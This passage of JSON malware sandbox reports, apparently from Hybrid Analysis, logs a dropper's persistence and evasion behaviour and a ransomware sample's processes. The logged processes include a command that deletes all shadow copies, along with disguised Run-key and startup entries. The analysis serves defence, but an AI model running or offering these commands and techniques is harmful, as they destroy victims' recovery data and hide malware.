\"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"NAME\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"PARENTFOLDER\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"DESCRIPTION\"; Value: \"\")\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\FOLDERDESCRIPTIONS\\{FDD39AD0-238F-46AF-ADB4-6C85480369C7}\"; Key: \"RELATIVEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-139", "type": 6, "relevance": 3, "name": "Calls an API typically used to load a resource in memory", "description": "\"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480748'}\" (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '5480732'}\" (UID: 00000000-00006020)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \".bss\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" queries volume information of \"C:\\\" at 00000000-00005848-0000010C-183468\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00006020-0000010C-1063696\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005864-0000010C-410871", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"085cda53603755dc.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006020)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" queries volume information of \"C:\\\" at 00000000-00005848-0000010C-183468\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00006020-0000010C-1063696\n \"085cda53603755dc.exe\" queries volume information of \"C:\\\" at 00000000-00005864-0000010C-410871", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006600e0ad6600dbad6600000000000000000000006300000000019cdd22000000000000eb220095e1a677a0271700feffffff435caa775059aa77aa000000b8000000daad6600d8ad660024df22005ce3220000000000000000000000000000000000000000000000000000000000000000001c5ca97760d8c175ffffffff17000000d4de22002400000003000000c4e32200f0e822005ce322008600000000df220096edaa7702ae6600a06a80758600000024df22005ce322000000000086008800a06a807524df2200916c807502ae6600a06a8075a06a807594e3220002020000 (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005848)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000007200a8677200a3677200000000000000000000006f00000000019cdc22000000000000ea220095e1a677fa291700feffffff435caa775059aa77aa000000b8000000a2677200a067720024de22005ce2220000000000000000000000000000000000000000000000000000000000000000001c5ca97760d8c175ffffffff17000000d4dd22002400000003000000c4e22200f0e722005ce222008600000000de220096edaa77ca677200a06a80758600000024de22005ce222000000000086008800a06a807524de2200916c8075ca677200a06a8075a06a807594e2220002020000 (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006020)\n \"085cda53603755dc.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dcf5220000000000700000002cf62200feffffffb4f52200cf00ab77d600ab7766ce9f7770000000380000002cf622000000000088f5220000000000f0f52200 (UID: 00000000-00006020)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"085cda53603755dc.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006020)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindFirstFileW\" with parameter %TEMP%\\*.* (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter 085cda53603755dc.exe (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter 10D5CC3F-71C4-40D7-8173-E990C25C1412.Diagnose.Admin.0.etl (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter 1df892bc-2ec3-4d0e-ac47-1eabbc40bce1.tmp (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter 8578e504-fb9e-4973-8218-da2b499cb57d.tmp (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter 99F9947D-30DB-4640-92C7-6BB2A24B05F1.Diagnose.Admin.0.etl (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter a881a3c9-dc11-47c4-9cf5-94257bfac790.tmp (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter AA7D7BE8-CE8F-4570-A39C-1992F0466AAE.Diagnose.Admin.0.etl (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter AdobeARM.log (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter AdobeARM_NotLocked.log (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter AdobeSFX.log (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter Adobe_ADMLogs (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00001.log (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter ASPNETSetup_00002.log (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter c278146c-ed5a-46a3-b7ee-8da417122e54.tmp (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter ccversion.tag (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter chromesetup.msi (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter chrome_installer.log (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter CVR640E.tmp.cvr (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter CVR78E9.tmp.cvr (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter CVRC166.tmp.cvr (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter CVRE8FB.tmp.cvr (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter dat17FA.tmp (UID: 00000000-00005848)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" called \"FindNextFileW\" with parameter dat17FB.tmp (UID: 00000000-00005848)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000005\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000006\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000007\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000008\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"085cda53603755dc.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000009\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-60", "relevance": 10, "name": "PE file contains unusual section name", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" has a section named \".eh_fram\"\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" has a section named \".CRT\"\n \"085cda53603755dc.exe\" has a section named \".eh_fram\"\n \"085cda53603755dc.exe\" has a section named \".CRT\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "static-8", "relevance": 10, "name": "Sample translates to unusual binary language", "description": "Russian (ID: 0x0419)", "origin": "Static Parser"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"system\" (Source: 559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0, API is part of module: MSVCRT.DLL)\n Found string \"shutdown\" (Source: 559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0, API is part of module: WS2_32.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "registry-0", "type": 3, "relevance": 8, "name": "Modifies auto-execute functionality by setting/creating a value in the registry", "description": "\"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"CREATE\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00005848]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" wrote 16279 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0\" has section name .text with entropy \"6.12526528121\"\n \"085cda53603755dc.exe\" has section name .text with entropy \"6.12526528121\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"085cda53603755dc.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-136", "type": 3, "relevance": 3, "name": "Writes registry keys", "description": "\"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")\n \"085cda53603755dc.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE\"; Key: \"*SYSTEM HEALTH MONITORING SERVICE PRO\"; Value: \"\"%TEMP%\\085cda53603755dc.exe\"\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"085cda53603755dc.exe\" marked \"C:\\559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"085cda53603755dc.exe\" opened \"C:\\559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 184)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 184)\n \"559a8644fd0335023f86b8349aeb35adbb2b96200710a39f34c3b4da61b200f0.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 184)\n \"085cda53603755dc.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)\n \"085cda53603755dc.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)\n \"085cda53603755dc.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\" (Handle: 224)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2
https://hybrid-analysis.com/sample/f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2
Hybrid Analysis - Ransomware
{"size": 26624, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2", "sha256": "f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2", "av_detect": 85, "vx_family": "Ransom.HydraCrypt.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_processes": 10, "total_signatures": 188, "extracted_files": [{"name": "Internet Explorer.lnk", "file_path": "%APPDATA%\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk", "file_size": 2, "sha256": "e270aeb347f2165574c3a5c5bf11d038bcd3acd5abfdb5ae8a1b52d91cb842f0", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "svchost.exe (PID: 5968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "svchost.url", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.url", "file_size": 146, "sha256": "9442015bc37dc6ce0522f0576f46435fbce5d67ffa6aec9e4a8ed868f93a1052", "type_tags": ["url"], "description": "MS Windows 95 Internet shortcut text, ASCII text, with CRLF line terminators", "runtime_process": "svchost.exe (PID: 5968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "svchost.exe", "file_path": "%APPDATA%\\svchost.exe", "file_size": 26624, "sha256": "f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "svchost.exe (PID: 5968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "read_it.txt", "file_path": "%LOCALAPPDATA%\\Programs\\Python\\Python38-32\\Lib\\site-packages\\pkg_resources\\tests\\data\\my-test-package-source\\read_it.txt", "file_size": 962, "sha256": "62d5d9737197180da1404755041db64f82667b9bb4ae6ff6619b252ab5cb1695", "type_tags": ["text"], "description": "ASCII text, with CRLF line terminators", "runtime_process": "svchost.exe (PID: 5968)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005776", "name": "f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe", "normalized_path": "C:\\f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2.exe", "sha256": "f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2"}, {"uid": "00000000-00005968", "parentuid": "00000000-00005776", "name": "svchost.exe", "normalized_path": "%APPDATA%\\svchost.exe", "sha256": "f0dc37bda70caa023d17f3858612d5fa922aeb27b3f151ea5ebcf83045fa52b2"}, {"uid": "00000000-00000244", "parentuid": "00000000-00005968", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C vssadmin delete shadows /all /quiet & wmic shadowcopy delete", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004144", "parentuid": "00000000-00000244", "name": "vssadmin.exe", "normalized_path": "%WINDIR%\\system32\\vssadmin.exe", "command_line": "vssadmin delete shadows /all /quiet", "sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"}, {"uid": "00000000-00003480", "parentuid": "00000000-00000244", "name": "WMIC.exe", "normalized_path": "%WINDIR%\\System32\\Wbem\\WMIC.exe", "command_line": "wmic shadowcopy delete", "sha256": 